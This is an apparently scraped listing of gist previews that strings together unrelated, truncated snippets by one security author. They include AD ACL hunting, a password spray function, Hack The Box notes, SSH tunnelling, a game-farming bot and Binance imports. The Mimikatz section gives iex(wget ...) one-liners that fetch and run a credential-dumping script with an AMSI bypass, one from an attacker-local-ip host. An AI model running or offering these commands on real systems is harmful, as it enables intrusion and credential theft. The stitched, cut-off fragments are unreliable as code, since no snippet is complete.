This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Find-AclSth {
<#
.SYNOPSIS
Finds object ACLs in the current (or specified) domain with modification
rights set to non-built in objects.
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
Author: Will Schroeder (@harmj0y)
<#
Author: Itamar Mizrahi (@MrAnde7son)
License: GNU v3
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-LocalUserSprayAttack
{
<#
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@author Pichaya Morimoto (p.morimoto@sth.sh)
Tested on Rocket.Chat 3.16.1
As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat
"Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered."
However, no exact instruction was given. Here we go.
PoC:
# @author LongCat
Found that the HTB machine Blackfield seems to be broken, so root.txt can be read with a technique that is far too easy
(https://app.hackthebox.eu/machines/255)
The original idea: we are a domain user (svc_backup) in the Backup Operators group
and want to read root.txt, which belongs to administrator. The official walkthrough gives 2 techniques:
1. Use wbadmin to backup+restore the ntds.dit file (which stores the AD NTLM hashes)
and extract the NTLM hash to pass-the-hash in and take over domain admin
/**
 * run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
 * start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
 */
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
# @author LongCat (p.morimoto@sth.sh)
# Making SSH tunnels (-D, -R, -L)
Case 1: -D creates a socks4a proxy whose traffic exits to the network at the ssh server machine
This gives us a proxy on the MacOS machine; anything that uses this proxy has its network traffic routed through the ssh server
For example, server A can reach server B, we can reach server A, but we cannot reach server B directly
So we can set up a proxy so that traffic goes to server A -> server B onward
// Bot for farming TLM in the game Alien Worlds (the coins can be exchanged for real money on Binance)
// For testing only, don't use it for real; the author takes no responsibility for any bugs whatsoever
//
// Usage:
// 1. Register + log in at https://play.alienworlds.io/
// 2. You must have mined manually at least once before
// 3. Copy this script and paste it into the Console (F12)
// There are probably bugs around rate limits and the like, and some of the if/loops could be removed
// Ran it for fun for 5 hours from a fresh user and got 8 TLM (depends on luck and other things too)
// If anyone has free time, changing it to hit the API directly instead of going through JS would probably be a lot more stable
# Automatically enable Macbook Pro's Touch ID for sudo after MacOS version upgrade
sudotouchid () {
if ! /usr/bin/grep -Fq "pam_tid.so" /etc/pam.d/sudo
then
# Use Touch ID to enable Touch ID for sudo
/usr/bin/osascript -e 'do shell script "/usr/bin/sed -i '' -e \"1s/^//p; 1s/^.*/auth sufficient pam_tid.so/\" /etc/pam.d/sudo" with administrator privileges'
fi
}
sudotouchid
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# https://python-binance.readthedocs.io/en/latest/
# apt install python3-pip
# pip3 install python-binance requests
import requests
from binance.client import Client
import json
import decimal
import datetime